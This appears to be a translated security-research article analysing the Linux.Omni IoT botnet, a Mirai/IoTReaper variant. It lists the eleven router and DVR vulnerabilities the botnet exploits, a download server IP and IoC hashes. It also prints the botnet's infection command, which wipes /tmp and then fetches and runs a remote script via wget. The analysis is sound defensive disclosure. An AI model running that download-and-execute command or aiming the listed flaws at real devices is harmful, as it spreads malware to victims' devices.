导语:长期以来,我们对网络上活动的Linux和IoT威胁进行分类和分析工作。本文将主要介绍针对Linux.Omni僵尸网络进行分析,我们从部署的蜜罐中检测到该恶意软件。
一、概述
长期以来,我们对网络上活动的Linux和IoT威胁进行分类和分析工作。本文将主要介绍针对Linux.Omni僵尸网络进行分析,我们从部署的蜜罐中检测到该恶意软件。之所以这个僵尸网络引起了我们的注意,是因为它的感染库中包含高达11种不同的漏洞。经过分析,我们最终确定该威胁属于IoTReaper的新版本。
二、二进制分析
首先,让我们感到惊讶的第一件事就是该恶意软件的分类,也就是OMNI。近几周来,我们检测到了OWARI、TOKYO、SORA、ECCHI等等,所有这些恶意软件都是Gafgyt和Mirai的分支版本。并且,所有这些恶意软件与之前的分析结果相比,没有任何创新。
因此,分析该恶意软件的感染方式,我们发现如下说明:
如我们所见,这是一个非常常见的脚本,通过另一个僵尸网络感染。
尽管当前,一切证据都表明这个样本是Mirai或Gafgyt的一个常见变种,但我们还是对样本进行了下载和分析。
在分析过程中,我们初步发现二进制文件是使用UPX进行加壳的,这在大多数同类型样本中不是很常见,但在其他一些流行的僵尸网络变种中却并不罕见。
经过查看二进制文件后,我们发现其二进制文件的基本结构与Mirai相匹配。
但是,我们在分析二进制文件中的感染选项时,发现其攻击方式存在不同。除了使用默认凭据进行传播之外,它还利用了已经在IoTReaper、Okiru、Satori等其他僵尸网络中发现的IoT设备漏洞,包括近期发现的影响GPON路由器的漏洞。
接下来,让我们来仔细分析Omni所使用的漏洞。
2.1 Vacron
在“board.cgi”中,使用了VACRON网络视频录像机中代码注入的漏洞,该参数在HTTP请求解析中,并没有得到较好的调试。我们曾发现IoTReaper僵尸网络利用了这一漏洞。
2.2 Netgear – CVE-2016-6277
在Omni中发现的另一个漏洞是CVE-2016-6277,该漏洞是通过对受影响路由器的cgi-bin/目录进行GET请求实现,最终导致远程代码执行。该漏洞影响Netgear如下型号的路由器:R6400、R7000、R7000P、R7500、R7800、R8000、R8500、R9000。
2.3 D-Link – 通过UPnP进行操作系统命令注入
与IoTReaper一样,Omni也利用了D-Link路由器的命令。僵尸网络利用了hedwig.cgi中存在的Cookie溢出漏洞,并通过UPnP接口实现命令注入。
请求如下:
我们可以在二进制文件中查看该漏洞:
受漏洞影响的固件版本如下:
· DIR-300 rev B – 2.14b01
· DIR-600 – 2.16b01
· DIR-645 – 1.04b01
· DIR-845 – 1.01b02
· DIR-865 – 1.05b03
2.4 CCTV-DVR
恶意软件使用的另一个漏洞,影响了70多个不同的厂商。该漏洞与“/language/Swedish”资源相关,最终允许远程执行代码。
可以在这里找到受该漏洞影响的设备列表:
http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
2.5 D-Link – HNAP
该漏洞在2014年被发现,允许绕过CAPTCHA登录认证,同时允许外部攻击者执行远程代码。该漏洞被恶意软件The Moon使用。
该漏洞影响如下固件版本的D-Link路由器:
· DI-524 C1 3.23
· DIR-628 B2 1.20NA 1.22NA
· DIR-655 A1 1.30EA
2.6 TR-069 – SOAP
该漏洞在2016年11月,被Mirai僵尸网络利用,最终导致德国电信被攻陷。
漏洞如下:
二进制文件中相应部分如下:
2.7 华为HG532路由器 – 任意命令执行
华为HG532路由器中存在配置文件错误验证的漏洞,攻击者可以通过修改HTTP请求来利用这一漏洞,最终实现任意命令执行。
目前已经发现,Okiru、Satori恶意软件利用了这一漏洞,并且我们已经在此前的文章进行了分析:https://www.securityartwork.es/2018/03/13/analysis-of-linux-okiru/
2.8 Netgear – Setup.cgi远程代码执行
该漏洞影响Netgear路由器DGN1000 1.1.00.48固件版本,在未经验证的情况下,允许远程执行代码。
2.9 Realtek SDK
多个设备使用了带有miniigd守护程序的Realtel SDK,这些守护程序存在通过UPnP SOAP接口实现的命令注入漏洞。该漏洞与上面提到的华为路由器漏洞一样,已经发现被Okiru、Satori恶意软件利用。
2.10 GPON
最后,我们发现了该僵尸网络利用的最新漏洞,该漏洞在上个月被发现,影响GPON路由器。目前,该漏洞已经在一些针对Linux服务器的IoT僵尸网络和挖矿恶意程序中被利用。
此外,僵尸网络也通过默认凭证的方式实现扩散,这些凭证使用了与0x33不同的密钥进行XOR编码(0x33是该恶意软件家族通常使用的密钥),其中每个组合都使用不同的密钥。
三、基础设施分析
尽管攻击方式各有不同,但在设备上执行的命令是相同的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
其下载的文件是bash脚本,该脚本会根据受感染设备的体系结构来下载不同的样本。
我们可以看到,这里进行的漏洞利用与我们所分析的样本并不对应。在这里,只会搜索具有潜在受漏洞影响的HTTP接口的设备,并且会检查是否存在默认凭据的问题,从而感染其他设备。感染途径共有两种,一种是使用前面提到的11个漏洞,另一种是针对公开HTTP服务的潜在目标尝试默认凭据登录。
因此,该体系结构与之前我们发现IoTReaper僵尸网络的体系结构非常相似。
四、寻找Omni幕后黑手
通过对二进制文件的深入调查,我们找到了IP地址213.183.53 [.] 120,该IP地址作为样本的下载服务器。尽管没有找到可用的目录列表,但我们在根目录中找到了一个“Discord”平台,该平台通常是游戏玩家观众的文字和语音聊天工具。
由于该平台不需要任何权限或邀请就能进入,我们使用了megahacker名称,进入聊天。
在加入后,我们发现,聊天的主题并非游戏,而是关于销售僵尸网络服务的内容。
在房间内观察了几分钟之后,我们发现在Omni背后的网络犯罪分子名为Scarface。并且,他为他的僵尸网络制作了一些非常酷的广告海报。
此外,该网络犯罪分子还提供僵尸网络的用户支持服务,并且接受潜在消费者提出的需求,正在尝试提升僵尸网络,使其达到60 Gbps的目标。
我们发现,网络犯罪分子非常不专业,Scarface多次展示其使用僵尸网络获得的“成绩”,其中的一些数字非常荒谬。此外,该网络犯罪分子极其警惕,担心每一位进入该聊天室的人都有可能是警察。
最终,我们确定了Linux.Omni恶意软件实际上就是IoTReaper恶意软件的更新版本,二者使用了相同的网络架构格式,并且Linux.Omni使用了Mirai的源代码。
五、Yara规则
六、IoC
· 213.183.53[.]120
· 21aa9c42b42e95c98e52157fd63f36c289c29a7b7a3824f4f70486236a2985ff
· 4cf7e64c3b9c1ad5fa57d0d0bbdeb930defcdf737fda9639955be1e78b06ded6
· 6dfd411f2558e533728bfb04dd013049dd765d61e3c774788e3beca404e0fd73
· 000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63
· 5ad981aefed712909294af47bce51be12524f4b547a63d7faaa40d3260e73235
· 31a2779c91846e37ad88e9803cbad8f8931e3229e88037f1d27437141ecbd164
· 528344fd220eff87b7494ca94caed6eae7886d8003ad37154fdb7048029e880b
· cfca058a4d0a29b3da285a5df21b14c360fb3291dff3c941659fe27f3738ba3e
· 2b32375864d0849e676536b916465a1fbb754bbdf783421948023467d364fb4c
· 700c9b51e6f8750a20fcc7019207112690974dcda687a83626716d8233923c17
· feb362167c9251dd877a0d76d3b42b68fcd334181946523ca808382852f48b7d
· ca6bc4e4c490999f97ee3fd1db41373fc0ba114dce2e88c538998d19a6f694da
· fc4cfc6300e3122ef9bbe6da3634d3b9839e833e4fc2cea8f1498623398af015
· 0fd93aeb2af3541daa152d9aff8388c89211b99d46ead1220c539fa178543bca
· 02a61e1d80b1f25d161de8821a31cd710987772668ce62c8be6d9afabe932712
· 377a49403cef46902e77ff323fcc9a8f74ea041743ccdbff41de3c063367c99a
· 812aa39075027b21671e5a628513378c598aef0feb57d0f5d837375c73ade8e8
· c9caccd707504634185ee2a94302e3964fb6747963e7020dffa34de85bd4d2ce
· a159c7b5d2c38071eb11f5e28b26f7d8beaf6f0f19a8c704687f26bfa9958d78
· 5eb7801551ee15baec5ef06b0265d0d0cc8488f16763517344bb8456a2831b82
· 2f1d0794d24b7b4f164ebce5bdde6fccd57cdbf91ea90ec2f628caf7fd991ce4